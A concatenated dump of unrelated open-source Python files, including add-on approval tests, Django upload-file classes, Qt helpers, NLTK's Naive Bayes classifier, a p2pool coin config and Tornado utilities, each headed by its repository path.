addon1 = addon_factory(status=amo.STATUS_NOMINATED, guid='foo')
addon1_file = addon1.find_latest_version(
amo.RELEASE_CHANNEL_LISTED).files.get()
addon1_file.update(status=amo.STATUS_AWAITING_REVIEW)
# Create another add-on that we won't get the files for.
addon2 = addon_factory(status=amo.STATUS_NOMINATED, guid='bar')
addon2_file = addon2.find_latest_version(
amo.RELEASE_CHANNEL_LISTED).files.get()
addon2_file.update(status=amo.STATUS_AWAITING_REVIEW)
# There's only the addon1's file returned, no other.
assert approve_addons.get_files(['foo']) == [addon1_file]
def id_function(fixture_value):
"""Convert a param from the use_case fixture to a nicer name.
By default, the name (used in the test generated from the parameterized
fixture) will use the fixture name and a number.
Eg: test_foo[use_case0]
Providing explicit 'ids' (either as strings, or as a function) will use
those names instead. Here the name will be something like
test_foo[public-unreviewed-full], for the status values, and if the file is
unreviewed.
"""
addon_status, file_status, review_type = fixture_value
return '{0}-{1}-{2}'.format(amo.STATUS_CHOICES_API[addon_status],
amo.STATUS_CHOICES_API[file_status],
review_type)
@pytest.fixture(
params=[(amo.STATUS_NOMINATED, amo.STATUS_AWAITING_REVIEW, 'full'),
(amo.STATUS_PUBLIC, amo.STATUS_AWAITING_REVIEW, 'full')],
# ids are used to build better names for the tests using this fixture.
ids=id_function)
def use_case(request, db):
"""This fixture will return quadruples for different use cases.
Addon | File1 and 2 | Review type
==============================================================
awaiting review | awaiting review | approved
approved | awaiting review | approved
"""
addon_status, file_status, review_type = request.param
addon = addon_factory(status=addon_status, guid='foo')
version = addon.find_latest_version(amo.RELEASE_CHANNEL_LISTED)
file1 = version.files.get()
file1.update(status=file_status)
# A second file for good measure.
file2 = amo.tests.file_factory(version=version, status=file_status)
# If the addon is public, and we change its only file to something else
# than public, it'll change to unreviewed.
addon.update(status=addon_status)
assert addon.reload().status == addon_status
assert file1.reload().status == file_status
assert file2.reload().status == file_status
return (addon, file1, file2, review_type)
@pytest.fixture
def mozilla_user(db):
"""Create and return the "mozilla" user used to auto approve addons."""
return amo.tests.user_factory(id=settings.TASK_USER_ID)
def test_approve_addons_get_files(use_case):
"""Files that need to get approved are returned in the list.
Use cases are quadruples taken from the "use_case" fixture above.
"""
addon, file1, file2, review_type = use_case
assert approve_addons.get_files([addon.guid]) == [file1, file2]
@pytest.mark.django_db
def test_approve_addons_approve_files_no_review_type():
"""Files which don't need approval don't change status."""
# Create the "mozilla" user, needed for the log.
amo.tests.user_factory(id=settings.TASK_USER_ID)
addon = addon_factory(status=amo.STATUS_PUBLIC)
file_ = addon.versions.get().files.get()
file_.update(status=amo.STATUS_PUBLIC)
approve_addons.approve_files([(file_, None)])
# Nothing changed.
assert addon.reload().status == amo.STATUS_PUBLIC
assert file_.reload().status == amo.STATUS_PUBLIC
def test_approve_addons_approve_files(use_case, mozilla_user):
"""Files are approved using the correct review type.
Use cases are quadruples taken from the "use_case" fixture above.
"""
addon, file1, file2, review_type = use_case
approve_addons.approve_files([(file1, review_type),
(file2, review_type)])
assert file1.reload().status == amo.STATUS_PUBLIC
assert file2.reload().status == amo.STATUS_PUBLIC
logs = AddonLog.objects.filter(addon=addon)
assert len(logs) == 2 # One per file.
file1_log, file2_log = logs
# An AddonLog has been created for each approval.
assert file1_log.activity_log.details['comments'] == u'bulk approval'
assert file1_log.activity_log.user == mozilla_user
assert file2_log.activity_log.details['comments'] == u'bulk approval'
assert file2_log.activity_log.user == mozilla_user
# No ReviewerScore was granted, it's an automatic approval.
assert not ReviewerScore.objects.all()
@pytest.mark.django_db
def test_approve_addons_get_review_type_already_approved():
"""The review type for a file that doesn't need approval is None."""
addon = addon_factory(status=amo.STATUS_PUBLIC)
file_ = addon.versions.get().files.get()
file_.update(status=amo.STATUS_PUBLIC)
assert approve_addons.get_review_type(file_) is None
def test_approve_addons_get_review_type(use_case):
"""Review type depends on the file and addon status.
Use cases are quadruples taken from the "use_case" fixture above.
"""
addon, file1, _, review_type = use_case
assert approve_addons.get_review_type(file1) == review_type
def test_process_addons_invalid_task():
with pytest.raises(CommandError):
call_command('process_addons', task='foo')
|
miquelramirez/LAPKT-public
|
refs/heads/master
|
2.0/external/fd/timers.py
|
3
|
from __future__ import print_function
# -*- coding: utf-8 -*-
import contextlib
import os
import sys
import time
class Timer(object):
def __init__(self):
self.start_time = time.time()
self.start_clock = self._clock()
def _clock(self):
times = os.times()
return times[0] + times[1]
def __str__(self):
return "[%.3fs CPU, %.3fs wall-clock]" % (
self._clock() - self.start_clock,
time.time() - self.start_time)
def report( self ) :
return self._clock() - self.start_clock
@contextlib.contextmanager
def timing(text, block=False):
timer = Timer()
if block:
print("%s..." % text)
else:
print("%s..." % text, end=' ')
sys.stdout.flush()
yield
if block:
print("%s: %s" % (text, timer))
else:
print(timer)
sys.stdout.flush()
|
litchfield/django
|
refs/heads/master
|
django/core/files/uploadedfile.py
|
471
|
"""
Classes representing uploaded files.
"""
import errno
import os
from io import BytesIO
from django.conf import settings
from django.core.files import temp as tempfile
from django.core.files.base import File
from django.utils.encoding import force_str
__all__ = ('UploadedFile', 'TemporaryUploadedFile', 'InMemoryUploadedFile',
'SimpleUploadedFile')
class UploadedFile(File):
"""
A abstract uploaded file (``TemporaryUploadedFile`` and
``InMemoryUploadedFile`` are the built-in concrete subclasses).
An ``UploadedFile`` object behaves somewhat like a file object and
represents some file data that the user submitted with a form.
"""
DEFAULT_CHUNK_SIZE = 64 * 2 ** 10
def __init__(self, file=None, name=None, content_type=None, size=None, charset=None, content_type_extra=None):
super(UploadedFile, self).__init__(file, name)
self.size = size
self.content_type = content_type
self.charset = charset
self.content_type_extra = content_type_extra
def __repr__(self):
return force_str("<%s: %s (%s)>" % (
self.__class__.__name__, self.name, self.content_type))
def _get_name(self):
return self._name
def _set_name(self, name):
# Sanitize the file name so that it can't be dangerous.
if name is not None:
# Just use the basename of the file -- anything else is dangerous.
name = os.path.basename(name)
# File names longer than 255 characters can cause problems on older OSes.
if len(name) > 255:
name, ext = os.path.splitext(name)
ext = ext[:255]
name = name[:255 - len(ext)] + ext
self._name = name
name = property(_get_name, _set_name)
class TemporaryUploadedFile(UploadedFile):
"""
A file uploaded to a temporary location (i.e. stream-to-disk).
"""
def __init__(self, name, content_type, size, charset, content_type_extra=None):
if settings.FILE_UPLOAD_TEMP_DIR:
file = tempfile.NamedTemporaryFile(suffix='.upload',
dir=settings.FILE_UPLOAD_TEMP_DIR)
else:
file = tempfile.NamedTemporaryFile(suffix='.upload')
super(TemporaryUploadedFile, self).__init__(file, name, content_type, size, charset, content_type_extra)
def temporary_file_path(self):
"""
Returns the full path of this file.
"""
return self.file.name
def close(self):
try:
return self.file.close()
except OSError as e:
if e.errno != errno.ENOENT:
# Means the file was moved or deleted before the tempfile
# could unlink it. Still sets self.file.close_called and
# calls self.file.file.close() before the exception
raise
class InMemoryUploadedFile(UploadedFile):
"""
A file uploaded into memory (i.e. stream-to-memory).
"""
def __init__(self, file, field_name, name, content_type, size, charset, content_type_extra=None):
super(InMemoryUploadedFile, self).__init__(file, name, content_type, size, charset, content_type_extra)
self.field_name = field_name
def open(self, mode=None):
self.file.seek(0)
def chunks(self, chunk_size=None):
self.file.seek(0)
yield self.read()
def multiple_chunks(self, chunk_size=None):
# Since it's in memory, we'll never have multiple chunks.
return False
class SimpleUploadedFile(InMemoryUploadedFile):
"""
A simple representation of a file, which just has content, size, and a name.
"""
def __init__(self, name, content, content_type='text/plain'):
content = content or b''
super(SimpleUploadedFile, self).__init__(BytesIO(content), None, name,
content_type, len(content), None, None)
@classmethod
def from_dict(cls, file_dict):
"""
Creates a SimpleUploadedFile object from
a dictionary object with the following keys:
- filename
- content-type
- content
"""
return cls(file_dict['filename'],
file_dict['content'],
file_dict.get('content-type', 'text/plain'))
|
danbradham/hotline
|
refs/heads/master
|
hotline/utils.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from contextlib import contextmanager
from functools import partial
try:
from Queue import Queue
except ImportError:
from queue import Queue
from timeit import default_timer
import subprocess
import sys
from hotline.vendor.Qt import QtCore, QtGui, QtWidgets
__all__ = [
'Executor',
'execute_in_main_thread',
'new_process',
'redirect_stream',
'qt_sleep',
'sleep_until',
]
def keys_to_string(key, modifiers):
key = QtGui.QKeySequence(key).toString()
if key == 'Return':
key = 'Enter'
if key == 'Backtab':
key = 'Tab'
mods = []
if modifiers & QtCore.Qt.ShiftModifier:
mods.append('Shift+')
if modifiers & QtCore.Qt.ControlModifier:
mods.append('Ctrl+')
if modifiers & QtCore.Qt.AltModifier:
mods.append('Alt+')
if modifiers & QtCore.Qt.MetaModifier:
mods.append('Meta+')
mods = ''.join(mods)
return '+'.join([mods, key])
def new_process(*args, **kwargs):
'''Wraps subprocess.Popen and polls until the process returns or the
timeout is reached (2 seconds by default).
:param args: subprocess.Popen args
:param kwargs: subprocess.Popen kwargs
:param timeout: Number of seconds to poll process before returning
:returns: (stdout, stderr) or None if timeout reached
'''
timeout = kwargs.pop('timeout', 2)
if sys.platform == 'win32':
create_new_process_group = 0x00000200
detached_process = 0x00000008
creation_flags = detached_process | create_new_process_group
kwargs.setdefault('creationflags', creation_flags)
kwargs.setdefault('stdin', subprocess.PIPE)
kwargs.setdefault('stdout', subprocess.PIPE)
kwargs.setdefault('stderr', subprocess.PIPE)
kwargs.setdefault('shell', True)
p = subprocess.Popen(args, **kwargs)
s = default_timer()
while default_timer() - s < timeout:
p.poll()
if p.returncode is not None:
break
if p.returncode is None:
return
return p.stdout.read(), p.stderr.read()
@contextmanager
def redirect_stream(stdout=None, stderr=None, stdin=None):
'''Temporarily redirect output stream'''
sys.stdout = stdout or sys.__stdout__
sys.stderr = stderr or sys.__stderr__
sys.stdin = stdin or sys.__stdin__
try:
yield
finally:
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
sys.stdin = sys.__stdin__
class Executor(QtCore.QObject):
'''Executes functions in the main QThread'''
def __init__(self):
super(Executor, self).__init__()
self.queue = Queue()
def execute(self, fn, *args, **kwargs):
callback = partial(fn, *args, **kwargs)
self.queue.put(callback)
QtCore.QMetaObject.invokeMethod(
self,
'_execute',
QtCore.Qt.QueuedConnection
)
@QtCore.Slot()
def _execute(self):
callback = self.queue.get()
callback()
Executor = Executor()
def execute_in_main_thread(fn, *args, **kwargs):
'''
Convenience method for Executor.execute...Executes a function in the
main QThread as soon as possible.
'''
Executor.execute(fn, *args, **kwargs)
@contextmanager
def event_loop(conditions=None, timeout=None, parent=None):
loop = QtCore.QEventLoop(parent)
if timeout:
QtCore.QTimer.singleShot(timeout, loop.quit)
if conditions:
ctimer = QtCore.QTimer()
def check_conditions():
for condition in conditions:
if condition():
ctimer.stop()
loop.quit()
ctimer.timeout.connect(check_conditions)
ctimer.start()
try:
yield loop
finally:
loop.exec_()
def qt_sleep(secs=0):
'''Non-blocking sleep for Qt'''
start = default_timer()
app = QtWidgets.QApplication.instance()
while True:
app.processEvents()
if default_timer() - start > secs:
return
def sleep_until(wake_condition, timeout=None, sleep=qt_sleep):
'''
Process QApplication events until the wake_condition returns True or
the timeout is reached...
:param wake_condition: callable returning True or False
:param timeout: Number of seconds to wait before returning
'''
start = default_timer()
while True:
if timeout:
if default_timer() - start > timeout:
return
if wake_condition():
return
sleep(0.1)
|
Comunitea/CMNT_004_15
|
refs/heads/11.0
|
project-addons/ubl_edi_to_es/models/sale.py
|
1
|
from odoo import models, fields
class SaleOrderLine(models.Model):
_inherit = 'sale.order.line'
qty_available_es = fields.Float('Qty Avail. ES', related="product_id.virtual_stock_conservative_es",readonly=1)
|
savoirfairelinux/django
|
refs/heads/master
|
tests/migrations/test_migrations_unmigdep/0001_initial.py
|
133
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("auth", "__first__"),
]
operations = [
migrations.CreateModel(
"Book",
[
("id", models.AutoField(primary_key=True)),
("user", models.ForeignKey("auth.User", models.SET_NULL, null=True)),
],
)
]
|
coblo/isccbench
|
refs/heads/master
|
iscc_bench/scripts/title_length.py
|
1
|
# -*- coding: utf-8 -*-
"""Script to measure basic title length statisics"""
import unicodedata
from itertools import cycle
import numpy as np
from iscc_bench.readers import ALL_READERS
def iter_titles():
"""Iterate over titles"""
readers = [r() for r in ALL_READERS]
for reader in cycle(readers):
meta = next(reader)
yield meta.title
def reject_outliers(data, m=2.0):
"""Remove outliers from data."""
d = np.abs(data - np.median(data))
mdev = np.median(d)
s = d / mdev if mdev else 0.0
return data[s < m]
def check_subtitles():
readers = [r() for r in ALL_READERS]
for reader in cycle(readers):
meta = next(reader)
if " : " in meta.title:
print(reader.__name__, meta.title)
if __name__ == "__main__":
SAMPLE_SIZE = 100000
title_sizes = []
title_sizes_bytes = []
for n, title in enumerate(iter_titles()):
norm_title = unicodedata.normalize("NFKC", title)
title_sizes.append(len(norm_title))
title_sizes_bytes.append(len(norm_title.encode("utf-8")))
if n > SAMPLE_SIZE:
break
data = np.array(title_sizes, dtype=np.uint16)
abs_max = max(data)
print("Longest title in {} samples had {} chars.".format(SAMPLE_SIZE, abs_max))
print(
"Longest title in {} samples had {} bytes.".format(
SAMPLE_SIZE, max(title_sizes_bytes)
)
)
print("The mean title length of all titles is {} chars ".format(data.mean()))
cleaned = reject_outliers(data)
max_real = max(cleaned)
print("The longest title without outliers is {} chars.".format(max_real))
print("The mean title length without outliers is {} chars.".format(cleaned.mean()))
|
xiaozhuchacha/OpenBottle
|
refs/heads/master
|
grammar_induction/earley_parser/nltk/classify/naivebayes.py
|
7
|
# Natural Language Toolkit: Naive Bayes Classifiers
#
# Copyright (C) 2001-2017 NLTK Project
# Author: Edward Loper <edloper@gmail.com>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
A classifier based on the Naive Bayes algorithm. In order to find the
probability for a label, this algorithm first uses the Bayes rule to
express P(label|features) in terms of P(label) and P(features|label):
| P(label) * P(features|label)
| P(label|features) = ------------------------------
| P(features)
The algorithm then makes the 'naive' assumption that all features are
independent, given the label:
| P(label) * P(f1|label) * ... * P(fn|label)
| P(label|features) = --------------------------------------------
| P(features)
Rather than computing P(featues) explicitly, the algorithm just
calculates the numerator for each label, and normalizes them so they
sum to one:
| P(label) * P(f1|label) * ... * P(fn|label)
| P(label|features) = --------------------------------------------
| SUM[l]( P(l) * P(f1|l) * ... * P(fn|l) )
"""
from __future__ import print_function, unicode_literals
from collections import defaultdict
from nltk.probability import FreqDist, DictionaryProbDist, ELEProbDist, sum_logs
from nltk.classify.api import ClassifierI
##//////////////////////////////////////////////////////
## Naive Bayes Classifier
##//////////////////////////////////////////////////////
class NaiveBayesClassifier(ClassifierI):
"""
A Naive Bayes classifier. Naive Bayes classifiers are
paramaterized by two probability distributions:
- P(label) gives the probability that an input will receive each
label, given no information about the input's features.
- P(fname=fval|label) gives the probability that a given feature
(fname) will receive a given value (fval), given that the
label (label).
If the classifier encounters an input with a feature that has
never been seen with any label, then rather than assigning a
probability of 0 to all labels, it will ignore that feature.
The feature value 'None' is reserved for unseen feature values;
you generally should not use 'None' as a feature value for one of
your own features.
"""
def __init__(self, label_probdist, feature_probdist):
"""
:param label_probdist: P(label), the probability distribution
over labels. It is expressed as a ``ProbDistI`` whose
samples are labels. I.e., P(label) =
``label_probdist.prob(label)``.
:param feature_probdist: P(fname=fval|label), the probability
distribution for feature values, given labels. It is
expressed as a dictionary whose keys are ``(label, fname)``
pairs and whose values are ``ProbDistI`` objects over feature
values. I.e., P(fname=fval|label) =
``feature_probdist[label,fname].prob(fval)``. If a given
``(label,fname)`` is not a key in ``feature_probdist``, then
it is assumed that the corresponding P(fname=fval|label)
is 0 for all values of ``fval``.
"""
self._label_probdist = label_probdist
self._feature_probdist = feature_probdist
self._labels = list(label_probdist.samples())
def labels(self):
return self._labels
def classify(self, featureset):
return self.prob_classify(featureset).max()
def prob_classify(self, featureset):
# Discard any feature names that we've never seen before.
# Otherwise, we'll just assign a probability of 0 to
# everything.
featureset = featureset.copy()
for fname in list(featureset.keys()):
for label in self._labels:
if (label, fname) in self._feature_probdist:
break
else:
#print 'Ignoring unseen feature %s' % fname
del featureset[fname]
# Find the log probabilty of each label, given the features.
# Start with the log probability of the label itself.
logprob = {}
for label in self._labels:
logprob[label] = self._label_probdist.logprob(label)
# Then add in the log probability of features given labels.
for label in self._labels:
for (fname, fval) in featureset.items():
if (label, fname) in self._feature_probdist:
feature_probs = self._feature_probdist[label, fname]
logprob[label] += feature_probs.logprob(fval)
else:
# nb: This case will never come up if the
# classifier was created by
# NaiveBayesClassifier.train().
logprob[label] += sum_logs([]) # = -INF.
return DictionaryProbDist(logprob, normalize=True, log=True)
def show_most_informative_features(self, n=10):
# Determine the most relevant features, and display them.
cpdist = self._feature_probdist
print('Most Informative Features')
for (fname, fval) in self.most_informative_features(n):
def labelprob(l):
return cpdist[l, fname].prob(fval)
labels = sorted([l for l in self._labels
if fval in cpdist[l, fname].samples()],
key=labelprob)
if len(labels) == 1:
continue
l0 = labels[0]
l1 = labels[-1]
if cpdist[l0, fname].prob(fval) == 0:
ratio = 'INF'
else:
ratio = '%8.1f' % (cpdist[l1, fname].prob(fval) /
cpdist[l0, fname].prob(fval))
print(('%24s = %-14r %6s : %-6s = %s : 1.0' %
(fname, fval, ("%s" % l1)[:6], ("%s" % l0)[:6], ratio)))
def most_informative_features(self, n=100):
"""
Return a list of the 'most informative' features used by this
classifier. For the purpose of this function, the
informativeness of a feature ``(fname,fval)`` is equal to the
highest value of P(fname=fval|label), for any label, divided by
the lowest value of P(fname=fval|label), for any label:
| max[ P(fname=fval|label1) / P(fname=fval|label2) ]
"""
# The set of (fname, fval) pairs used by this classifier.
features = set()
# The max & min probability associated w/ each (fname, fval)
# pair. Maps (fname,fval) -> float.
maxprob = defaultdict(lambda: 0.0)
minprob = defaultdict(lambda: 1.0)
for (label, fname), probdist in self._feature_probdist.items():
for fval in probdist.samples():
feature = (fname, fval)
features.add(feature)
p = probdist.prob(fval)
maxprob[feature] = max(p, maxprob[feature])
minprob[feature] = min(p, minprob[feature])
if minprob[feature] == 0:
features.discard(feature)
# Convert features to a list, & sort it by how informative
# features are.
features = sorted(features,
key=lambda feature_:
minprob[feature_]/maxprob[feature_])
return features[:n]
@classmethod
def train(cls, labeled_featuresets, estimator=ELEProbDist):
"""
:param labeled_featuresets: A list of classified featuresets,
i.e., a list of tuples ``(featureset, label)``.
"""
label_freqdist = FreqDist()
feature_freqdist = defaultdict(FreqDist)
feature_values = defaultdict(set)
fnames = set()
# Count up how many times each feature value occurred, given
# the label and featurename.
for featureset, label in labeled_featuresets:
label_freqdist[label] += 1
for fname, fval in featureset.items():
# Increment freq(fval|label, fname)
feature_freqdist[label, fname][fval] += 1
# Record that fname can take the value fval.
feature_values[fname].add(fval)
# Keep a list of all feature names.
fnames.add(fname)
# If a feature didn't have a value given for an instance, then
# we assume that it gets the implicit value 'None.' This loop
# counts up the number of 'missing' feature values for each
# (label,fname) pair, and increments the count of the fval
# 'None' by that amount.
for label in label_freqdist:
num_samples = label_freqdist[label]
for fname in fnames:
count = feature_freqdist[label, fname].N()
# Only add a None key when necessary, i.e. if there are
# any samples with feature 'fname' missing.
if num_samples - count > 0:
feature_freqdist[label, fname][None] += num_samples - count
feature_values[fname].add(None)
# Create the P(label) distribution
label_probdist = estimator(label_freqdist)
# Create the P(fval|label, fname) distribution
feature_probdist = {}
for ((label, fname), freqdist) in feature_freqdist.items():
probdist = estimator(freqdist, bins=len(feature_values[fname]))
feature_probdist[label, fname] = probdist
return cls(label_probdist, feature_probdist)
##//////////////////////////////////////////////////////
## Demo
##//////////////////////////////////////////////////////
def demo():
from nltk.classify.util import names_demo
classifier = names_demo(NaiveBayesClassifier.train)
classifier.show_most_informative_features()
if __name__ == '__main__':
demo()
|
cowboysmall/rosalind
|
refs/heads/master
|
src/stronghold/rosalind_osym.py
|
1
|
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../tools'))
import fasta
import strings
def main(argv):
s, t = fasta.read_ordered(argv[0])
m, n = len(s), len(t)
T1 = strings.mismatch_alignment_table(s, t)
T2 = strings.mismatch_alignment_table(s[::-1], t[::-1])
total = 0
for i in xrange(1, m + 1):
for j in xrange(1, n + 1):
total += T1[i - 1][j - 1] + T2[m - i][n - j] + (1 if s[i - 1] == t[j - 1] else -1)
print T1[m][n]
print total
if __name__ == "__main__":
main(sys.argv[1:])
|
Rav3nPL/p2pool-rav
|
refs/heads/master
|
p2pool/bitcoin/networks/joulecoin.py
|
7
|
import os
import platform
from twisted.internet import defer
from .. import data, helper
from p2pool.util import pack
P2P_PREFIX = 'a5c07955'.decode('hex')
P2P_PORT = 26789
ADDRESS_VERSION = 43
RPC_PORT = 8844
RPC_CHECK = defer.inlineCallbacks(lambda bitcoind: defer.returnValue(
'joulecoinaddress' in (yield bitcoind.rpc_help()) and
not (yield bitcoind.rpc_getinfo())['testnet']
))
SUBSIDY_FUNC = lambda height: 16*100000000 >> (height * 1)//1401600
POW_FUNC = data.hash256
BLOCK_PERIOD = 45 # s
SYMBOL = 'XJO'
CONF_FILE_FUNC = lambda: os.path.join(os.path.join(os.environ['APPDATA'], 'joulecoin') if platform.system() == 'Windows' else os.path.expanduser('~/Library/Application Support/joulecoin/') if platform.system() == 'Darwin' else os.path.expanduser('~/.joulecoin'), 'joulecoin.conf')
BLOCK_EXPLORER_URL_PREFIX = 'http://xjo-explorer.cryptohaus.com:2750/block/'
ADDRESS_EXPLORER_URL_PREFIX = 'http://xjo-explorer.cryptohaus.com:2750/address/'
TX_EXPLORER_URL_PREFIX = 'http://xjo-explorer.cryptohaus.com:2750/tx/'
SANE_TARGET_RANGE = (2**256//2**32//1000 - 1, 2**256//2**32 - 1)
DUMB_SCRYPT_DIFF = 1
DUST_THRESHOLD = 0.001e8
|
Semi-global/edx-platform
|
refs/heads/master
|
cms/djangoapps/contentstore/management/commands/git_export.py
|
164
|
"""
This command exports a course from CMS to a git repository.
It takes as arguments the course id to export (i.e MITx/999/2020 ) and
the repository to commit too. It takes username as an option for identifying
the commit, as well as a directory path to place the git repository.
By default it will use settings.GIT_REPO_EXPORT_DIR/repo_name as the cloned
directory. It is branch aware, but will reset all local changes to the
repository before attempting to export the XML, add, and commit changes if
any have taken place.
This functionality is also available as an export view in studio if the giturl
attribute is set and the FEATURE['ENABLE_EXPORT_GIT'] is set.
"""
import logging
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from django.utils.translation import ugettext as _
import contentstore.git_export_utils as git_export_utils
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys import InvalidKeyError
from contentstore.git_export_utils import GitExportError
from opaque_keys.edx.keys import CourseKey
log = logging.getLogger(__name__)
class Command(BaseCommand):
"""
Take a course from studio and export it to a git repository.
"""
option_list = BaseCommand.option_list + (
make_option('--username', '-u', dest='user',
help=('Specify a username from LMS/Studio to be used '
'as the commit author.')),
make_option('--repo_dir', '-r', dest='repo',
help='Specify existing git repo directory.'),
)
help = _('Take the specified course and attempt to '
'export it to a git repository\n. Course directory '
'must already be a git repository. Usage: '
' git_export <course_loc> <git_url>')
def handle(self, *args, **options):
"""
Checks arguments and runs export function if they are good
"""
if len(args) != 2:
raise CommandError('This script requires exactly two arguments: '
'course_loc and git_url')
# Rethrow GitExportError as CommandError for SystemExit
try:
course_key = CourseKey.from_string(args[0])
except InvalidKeyError:
try:
course_key = SlashSeparatedCourseKey.from_deprecated_string(args[0])
except InvalidKeyError:
raise CommandError(unicode(GitExportError.BAD_COURSE))
try:
git_export_utils.export_to_git(
course_key,
args[1],
options.get('user', ''),
options.get('rdir', None)
)
except git_export_utils.GitExportError as ex:
raise CommandError(unicode(ex.message))
|
EmergingTechnologyAdvisors/blockly
|
refs/heads/master
|
i18n/tests.py
|
203
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Tests of i18n scripts.
#
# Copyright 2013 Google Inc.
# https://developers.google.com/blockly/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import common
import re
import unittest
class TestSequenceFunctions(unittest.TestCase):
def test_insert_breaks(self):
spaces = re.compile(r'\s+|\\n')
def contains_all_chars(orig, result):
return re.sub(spaces, '', orig) == re.sub(spaces, '', result)
sentences = [u'Quay Pegman qua bên trái hoặc bên phải 90 độ.',
u'Foo bar baz this is english that is okay bye.',
u'If there is a path in the specified direction, \nthen ' +
u'do some actions.',
u'If there is a path in the specified direction, then do ' +
u'the first block of actions. Otherwise, do the second ' +
u'block of actions.']
for sentence in sentences:
output = common.insert_breaks(sentence, 30, 50)
self.assert_(contains_all_chars(sentence, output),
u'Mismatch between:\n{0}\n{1}'.format(
re.sub(spaces, '', sentence),
re.sub(spaces, '', output)))
if __name__ == '__main__':
unittest.main()
|
kaushik94/tornado
|
refs/heads/master
|
tornado/util.py
|
102
|
"""Miscellaneous utility functions and classes.
This module is used internally by Tornado. It is not necessarily expected
that the functions and classes defined here will be useful to other
applications, but they are documented here in case they are.
The one public-facing part of this module is the `Configurable` class
and its `~Configurable.configure` method, which becomes a part of the
interface of its subclasses, including `.AsyncHTTPClient`, `.IOLoop`,
and `.Resolver`.
"""
from __future__ import absolute_import, division, print_function, with_statement
import array
import inspect
import os
import sys
import zlib
try:
xrange # py2
except NameError:
xrange = range # py3
class ObjectDict(dict):
"""Makes a dictionary behave like an object, with attribute-style access.
"""
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, value):
self[name] = value
class GzipDecompressor(object):
"""Streaming gzip decompressor.
The interface is like that of `zlib.decompressobj` (without some of the
optional arguments, but it understands gzip headers and checksums.
"""
def __init__(self):
# Magic parameter makes zlib module understand gzip header
# http://stackoverflow.com/questions/1838699/how-can-i-decompress-a-gzip-stream-with-zlib
# This works on cpython and pypy, but not jython.
self.decompressobj = zlib.decompressobj(16 + zlib.MAX_WBITS)
def decompress(self, value, max_length=None):
"""Decompress a chunk, returning newly-available data.
Some data may be buffered for later processing; `flush` must
be called when there is no more input data to ensure that
all data was processed.
If ``max_length`` is given, some input data may be left over
in ``unconsumed_tail``; you must retrieve this value and pass
it back to a future call to `decompress` if it is not empty.
"""
return self.decompressobj.decompress(value, max_length)
@property
def unconsumed_tail(self):
"""Returns the unconsumed portion left over
"""
return self.decompressobj.unconsumed_tail
def flush(self):
"""Return any remaining buffered data not yet returned by decompress.
Also checks for errors such as truncated input.
No other methods may be called on this object after `flush`.
"""
return self.decompressobj.flush()
def import_object(name):
"""Imports an object by name.
import_object('x') is equivalent to 'import x'.
import_object('x.y.z') is equivalent to 'from x.y import z'.
>>> import tornado.escape
>>> import_object('tornado.escape') is tornado.escape
True
>>> import_object('tornado.escape.utf8') is tornado.escape.utf8
True
>>> import_object('tornado') is tornado
True
>>> import_object('tornado.missing_module')
Traceback (most recent call last):
...
ImportError: No module named missing_module
"""
if name.count('.') == 0:
return __import__(name, None, None)
parts = name.split('.')
obj = __import__('.'.join(parts[:-1]), None, None, [parts[-1]], 0)
try:
return getattr(obj, parts[-1])
except AttributeError:
raise ImportError("No module named %s" % parts[-1])
# Fake unicode literal support: Python 3.2 doesn't have the u'' marker for
# literal strings, and alternative solutions like "from __future__ import
# unicode_literals" have other problems (see PEP 414). u() can be applied
# to ascii strings that include \u escapes (but they must not contain
# literal non-ascii characters).
if type('') is not type(b''):
def u(s):
return s
unicode_type = str
basestring_type = str
else:
def u(s):
return s.decode('unicode_escape')
unicode_type = unicode
basestring_type = basestring
# Deprecated alias that was used before we dropped py25 support.
# Left here in case anyone outside Tornado is using it.
bytes_type = bytes
if sys.version_info > (3,):
exec("""
def raise_exc_info(exc_info):
raise exc_info[1].with_traceback(exc_info[2])
def exec_in(code, glob, loc=None):
if isinstance(code, str):
code = compile(code, '<string>', 'exec', dont_inherit=True)
exec(code, glob, loc)
""")
else:
exec("""
def raise_exc_info(exc_info):
raise exc_info[0], exc_info[1], exc_info[2]
def exec_in(code, glob, loc=None):
if isinstance(code, basestring):
# exec(string) inherits the caller's future imports; compile
# the string first to prevent that.
code = compile(code, '<string>', 'exec', dont_inherit=True)
exec code in glob, loc
""")
def errno_from_exception(e):
"""Provides the errno from an Exception object.
There are cases that the errno attribute was not set so we pull
the errno out of the args but if someone instantiates an Exception
without any args you will get a tuple error. So this function
abstracts all that behavior to give you a safe way to get the
errno.
"""
if hasattr(e, 'errno'):
return e.errno
elif e.args:
return e.args[0]
else:
return None
class Configurable(object):
"""Base class for configurable interfaces.
A configurable interface is an (abstract) class whose constructor
acts as a factory function for one of its implementation subclasses.
The implementation subclass as well as optional keyword arguments to
its initializer can be set globally at runtime with `configure`.
By using the constructor as the factory method, the interface
looks like a normal class, `isinstance` works as usual, etc. This
pattern is most useful when the choice of implementation is likely
to be a global decision (e.g. when `~select.epoll` is available,
always use it instead of `~select.select`), or when a
previously-monolithic class has been split into specialized
subclasses.
Configurable subclasses must define the class methods
`configurable_base` and `configurable_default`, and use the instance
method `initialize` instead of ``__init__``.
"""
__impl_class = None
__impl_kwargs = None
def __new__(cls, **kwargs):
base = cls.configurable_base()
args = {}
if cls is base:
impl = cls.configured_class()
if base.__impl_kwargs:
args.update(base.__impl_kwargs)
else:
impl = cls
args.update(kwargs)
instance = super(Configurable, cls).__new__(impl)
# initialize vs __init__ chosen for compatibility with AsyncHTTPClient
# singleton magic. If we get rid of that we can switch to __init__
# here too.
instance.initialize(**args)
return instance
@classmethod
def configurable_base(cls):
"""Returns the base class of a configurable hierarchy.
